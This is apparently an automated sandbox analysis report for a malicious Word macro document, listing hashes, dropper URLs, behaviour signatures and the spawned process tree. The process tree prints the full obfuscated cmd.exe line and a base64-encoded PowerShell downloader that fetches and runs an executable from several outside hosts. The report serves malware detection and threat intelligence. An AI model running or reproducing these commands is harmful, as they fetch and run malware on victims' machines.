Analysis

  • max time kernel
    102s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 07:24

General

  • Target

    90f1c843da72e08351042e2d696fa7b7_JaffaCakes118.doc

  • Size

    81KB

  • MD5

    90f1c843da72e08351042e2d696fa7b7

  • SHA1

    ccad8c70384aebd24b7944192c3fedff8c1c8e59

  • SHA256

    4f73d7c59c7f1373e99d93cc4ba0babbe1fcc366269c427753b4a431ad97af8a

  • SHA512

    8b29e6cf1e476146f5bfcc2d61cecfa35d500d2258ebcc753fca899279e6d38942d936d6073bcb5416819da9c84050cbf764f985319858e0dd32ea3e4bae6b82

  • SSDEEP

    1536:SptJlmrJpmxlRw99NBk+aHTU4rTDUdUNAMeWT:Ote2dw99fJ4r3UdqAMe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blog.bctianfu.cn/4

exe.dropper

http://mail.vcacademy.lk/5nLo

exe.dropper

http://lamemoria.in/2ib2Pt

exe.dropper

http://tropicalislandrealtyofflorida.com/NNqM7W

exe.dropper

http://businessarbitr.ru/E

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\90f1c843da72e08351042e2d696fa7b7_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v^:^ON^ ^ /c" ^Se^T ^ A^K=A^ACA^gAA^I^A^ACA^gA^A^I^A^AC^A^gAAIA^ACAg^A^AI^A^ACA^gAA^I^A^ACAgAQfA0^H^A7^BA^a^AMG^A0^BQ^Y^AM^GA9^B^w^O^As^GAh^B^QZ^A^I^HAiBwOAc^EAC^B^A^aA^QC^A^g^A^QbA^UG^A^0B^QSA^0CAlBwaA8GA^2B^gb^AkEA^7A^QKAc^E^AC^B^A^a^AQC^A^gAALAU^EAjBw^Q^A^QC^A^oAQZA^wG^A^p^BgR^AQG^Ah^Bwb^AwGAu^B^w^d^A8^G^AE^B^g^L^AE^F^A^zBgQAQCA7^BQ^e^AI^H^A0^Bwe^A^kC^AV^BAcAk^GA^kA^A^IA^4^GAp^B^AI^AU^E^A^jB^w^QA^QC^A^o^A^AaA^MG^A^hB^Q^Z^AIHAv^BgZA^s^DAn^A^QZ^A^g^H^A^lB^g^LAcC^Ar^A^QdAsGAH^BA^JAsC^AnA^A^X^AcCAr^Aw^Y^A^kG^A^sB^gY^AUHA^w^BgO^A^Y^H^A^u^B^Q^Z^A^QC^A^9A^wRA^IEA^oB^A^JAsD^AnAwNAAD^A3^AwJAACA9^AA^IA^U^H^ArBwRA^QCA^7A^QK^AcCA^ABwJA^gCA^0BQaA^wGAw^B^w^U^A4C^AnA^QR^A^8C^A1^Bgc^A^4C^A^yB^A^d^Ak^GA^i^B^gc^A^E^GAzBwc^A^UGAu^BQ^aAM^H^A^1^Bg^Y^A^8CAv^A^g^O^AAHA^0BA^d^A^gG^A^AB^wV^AcD^AN^BQcA^4E^AOBw^L^A0GAv^BwY^A4CAhB^AZA^kGAyBwbAw^G^A^mB^gZ^A8GA^5B^AdA^wGAhBQ^Z^AIH^Ak^Bgb^A^EG^As^BwcAkG^As^B^QY^AMG^ApBAc^A^8G^AyBAdA8CAvA^g^OA^AH^A0^B^A^dAgG^AA^B^A^dAA^FAyA^g^YA^k^GA^y^A^wL^A^4^G^A^pB^gLA^E^GAp^B^gcA8^G^A^tB^Q^Z^A0^GAhBAbA8CAvA^gOAAHA0BA^dA^g^G^A^A^B^wbAw^E^A^u^BQN^A^8CArBAb^A^4CA^5^BQ^b^AU^GA^kBQY^A^MGA^h^B^wY^AYH^Au^AAb^A^k^G^AhB^QbA^8C^Av^AgO^A^AH^A0BA^d^A^gGA^A^B^ANA^8CA^u^BwYA4C^A1B^g^Z^A^4^G^Ah^B^Q^aA^QHA^jBg^YA^4CAn^Bwb^AwG^AiB^w^LA^8C^A^6AAcA^QH^A0^BAa^AcCA9A^QVAA^H^A^p^BAJA^sDA0^BgbA^UGA^p^B^AbA^M^E^AiBQZ^Ac^F^AuAAd^A^U^G^A^O^BAI^A^Q^HAjB^QZAoGA^i^B^w^bA0C^A3B^Q^Z^A4GA9A^QUAMHAC^B^AJ^ ^e- lle^h^sr^ewop&& ^F^oR /^L %^9 ^iN (^ ^ ^ ^965^ ^, ^ ^ -1 ,^ ^ ^0) ^dO ^S^Et G^Fr^1=!G^Fr^1!!A^K:~ %^9, 1!& ^i^F %^9 LsS ^1 cA^l^L %G^Fr^1:^~-^966% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JABCAHMAUQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAHAAVQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AYgBjAHQAaQBhAG4AZgB1AC4AYwBuAC8ANABAAGgAdAB0AHAAOgAvAC8AbQBhAGkAbAAuAHYAYwBhAGMAYQBkAGUAbQB5AC4AbABrAC8ANQBuAEwAbwBAAGgAdAB0AHAAOgAvAC8AbABhAG0AZQBtAG8AcgBpAGEALgBpAG4ALwAyAGkAYgAyAFAAdABAAGgAdAB0AHAAOgAvAC8AdAByAG8AcABpAGMAYQBsAGkAcwBsAGEAbgBkAHIAZQBhAGwAdAB5AG8AZgBmAGwAbwByAGkAZABhAC4AYwBvAG0ALwBOAE4AcQBNADcAVwBAAGgAdAB0AHAAOgAvAC8AYgB1AHMAaQBuAGUAcwBzAGEAcgBiAGkAdAByAC4AcgB1AC8ARQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARwBrAHUAIAA9ACAAJwA3ADAANwAnADsAJABoAEIARwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABHAGsAdQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwBjAEUAIABpAG4AIAAkAGkAcABVACkAewB0AHIAeQB7ACQAQgBzAFEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAQwBjAEUALAAgACQAaABCAEcAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAaABCAEcAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5160

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD7E17.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vhqzccv2.zup.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1412-2-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-7-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-15-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-13-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-8-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-9-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-3-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-1-0x00007FF9B406D000-0x00007FF9B406E000-memory.dmp

    Filesize

    4KB

  • memory/1412-10-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-12-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-11-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-14-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-17-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-18-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-16-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-19-0x00007FF971770000-0x00007FF971780000-memory.dmp

    Filesize

    64KB

  • memory/1412-6-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-20-0x00007FF971770000-0x00007FF971780000-memory.dmp

    Filesize

    64KB

  • memory/1412-5-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-27-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-28-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-30-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-562-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-4-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-56-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-0-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-444-0x00007FF9B406D000-0x00007FF9B406E000-memory.dmp

    Filesize

    4KB

  • memory/1412-445-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-536-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-537-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-538-0x00007FF9B3FD0000-0x00007FF9B41C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-558-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-559-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-560-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/1412-561-0x00007FF974050000-0x00007FF974060000-memory.dmp

    Filesize

    64KB

  • memory/5160-51-0x000002A8CFFB0000-0x000002A8CFFD2000-memory.dmp

    Filesize

    136KB